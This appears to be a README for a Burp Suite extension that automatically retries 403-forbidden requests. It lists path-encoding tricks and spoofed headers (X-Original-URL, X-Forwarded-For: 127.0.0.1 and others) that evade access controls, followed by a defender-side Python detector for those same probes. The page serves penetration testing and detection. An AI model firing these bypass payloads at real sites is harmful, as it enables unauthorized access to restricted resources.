403Bypasser – Burpsuite Extension To Bypass 403 Restricted Directory
A Burp Suite extension to bypass 403 restricted directories. By using PassiveScan (enabled by default), every 403 request is automatically scanned by this extension, so just add it to Burp Suite and enjoy.
Payloads ($1: HOSTNAME, $2: PATH):
$1/$2
$1/%2e/$2
$1/$2/.
$1//$2//
$1/./$2/./
$1/$2something -H "X-Original-URL: /$2"
$1/$2 -H "X-Custom-IP-Authorization: 127.0.0.1"
$1 -H "X-Rewrite-URL: /$2"
$1/$2 -H "Referer: /$2"
$1/$2 -H "X-Originating-IP: 127.0.0.1"
$1/$2 -H "X-Forwarded-For: 127.0.0.1"
$1/$2 -H "X-Remote-IP: 127.0.0.1"
$1/$2 -H "X-Client-IP: 127.0.0.1"
$1/$2 -H "X-Host: 127.0.0.1"
$1/$2 -H "X-Forwared-Host: 127.0.0.1"
$1/$2%20/
$1/%20$2%20/
$1/$2?
$1/$2???
$1/$2//
$1/$2/
$1/$2/.randomstring
$1/$2../
Thanks @lohubi for contributing several payloads.
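A defender-side sketch, added here and not part of the extension's code: it flags logged requests that match the path and header variations in the payload list above. The restricted prefix /admin, the function names and the sample requests are assumptions constructed for illustration.

```python
from urllib.parse import unquote

# Header names taken from the payload list, lower-cased for matching.
URL_OVERRIDE = {"x-original-url", "x-rewrite-url"}
IP_CLAIM = {"x-custom-ip-authorization", "x-originating-ip", "x-forwarded-for",
            "x-remote-ip", "x-client-ip", "x-host", "x-forwared-host"}

def canonical(raw):
    """Resolve the path the way a lenient backend might: drop the query,
    percent-decode, trim spaces, and collapse empty, '.' and '..' segments."""
    parts = []
    for seg in unquote(raw.split("?", 1)[0]).split("/"):
        seg = seg.strip()
        if seg == "..":
            if parts:
                parts.pop()
        elif seg not in ("", "."):
            parts.append(seg)
    return "/" + "/".join(parts)

def bypass_indicators(raw_path, headers, restricted):
    """Return reasons a logged request looks like a 403-bypass probe."""
    def hits(path):
        c = canonical(path)
        return any(c == r or c.startswith(r + "/") for r in restricted)
    reasons = []
    # A lone trailing slash or empty query is too common to flag on its own.
    plain = raw_path.split("?", 1)[0].rstrip("/") or "/"
    if hits(raw_path) and plain != canonical(raw_path):
        reasons.append("obfuscated-path")
    for name, value in headers.items():
        key = name.lower()
        if key in URL_OVERRIDE and hits(value):
            reasons.append("url-override:" + key)
        elif key in IP_CLAIM and value.strip() == "127.0.0.1":
            reasons.append("loopback-claim:" + key)
    return reasons

# Constructed samples (raw path, headers); "/admin" is an assumed restricted prefix.
SAMPLES = [
    ("/%2e/admin", {}),
    ("/", {"X-Rewrite-URL": "/admin"}),
    ("/admin", {"X-Forwarded-For": "127.0.0.1"}),
    ("/admin/", {}),
]

if __name__ == "__main__":
    for path, hdrs in SAMPLES:
        print(path, hdrs, "->", bypass_indicators(path, hdrs, {"/admin"}))
```

Run it against logs captured at the edge, before any trusted proxy adds its own forwarding headers; a backend that enforces access rules on the canonical path and ignores these client-supplied headers makes the flagged requests harmless.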
Installation
BurpSuite -> Extender -> Extensions -> Add -> Extension Type: Python -> Select file: 403bypasser.py -> Next till Finish
References:
- https://twitter.com/iam_j0ker/status/1324354024657711106?s=20
- https://twitter.com/jae_hak99/status/1297556269960540161?s=20
- https://twitter.com/SalahHasoneh1/status/1296572143141031945
- https://twitter.com/lobuhisec/status/1329705441883017218